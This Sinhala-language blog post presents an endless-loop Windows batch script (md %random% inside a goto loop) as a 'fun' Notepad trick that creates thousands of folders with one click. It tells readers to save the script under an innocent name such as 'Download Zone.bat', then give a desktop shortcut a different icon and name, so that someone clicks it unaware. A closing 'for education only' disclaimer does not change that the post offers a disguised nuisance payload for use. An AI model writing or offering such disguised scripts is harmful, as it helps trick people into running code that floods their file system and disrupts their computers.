පට්ට ෆන් එකක් ගමුද?

පොඩි ෆන් එකකටත් එක්ක

එක ක්ලික් එකකින් Folder 1000 කටත් වැඩිය හදමු....

                 
ඔයාගේ  පරිගනකයේ තියෙන නොට්පැඩ් එකෙන් පට්ට ෆන් එකක් ගමුද? ඔය නොට්පැඩ් එකෙන් ගොඩක් වැඩ කරගන්න පුලුවන් ට්‍රික්ස් ගොඩක් තියනවා.මේ ක ඇවිල්ලා ඒ වගෙන් එකක්. බලන්න මේ වැඩේ කොහොමද කියලා..
ක්ලික් කරපු ගමන් ෆෝල්ඩර් 1000 කටත් වැඩිය හැදෙන්න පොඩි කෝඩ් එකක් ගැනයි මේ
කියන්නෙ. පහල කෝඩ් එක නෝට්පෑඩ් එකකට Copy කරලා  සේව් කරගන්න.

@echo off
:top
md %random%
goto top








සේව් කරද්දි ඔයාලට කැමති නමකින් ඕක සේව් කරගන්න. හැබැයි අගට .bat විදියට.
උදාහරණ :-
Download Zone.bat
දැන් සේව් කරගත්තට පස්සේ පහල ආකරයේ අයිකොන් එකක් හම්බෙයි. මෙහෙම ක්ලික් කලත් හරි.තව පොඩ්ඩක් හැඩකරගන්න ඕනනම් පහත විදියටම හදාගන්න​…



මෙකේ Shortcut එකක් හදන්න Desktop එකට



ඊලගට මෙ ෆයිල් එකෙ Properties ගන්න




Change Icon වලට ගිහින් කැමති එකකට මාරු කරන්න




ඔයාල කැමතිනම්  නමත් මාරු කරන්න.



හරිමේ වගෙ එකක් දැක්කාම ක්ලික් කරපු ගමන් එක පාරින් ෆෝල්ඩර් 1000 කටත් වැඩිය  හැදෙනවා නියම ෆන් එක නේද........ 


  
 
අවවාදයයි :- මේ සියල්ල අධ්‍යාපනය සදහා පමණි..........
Share on Google Plus

About Praneeth Madush

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.

0 comments:

Post a Comment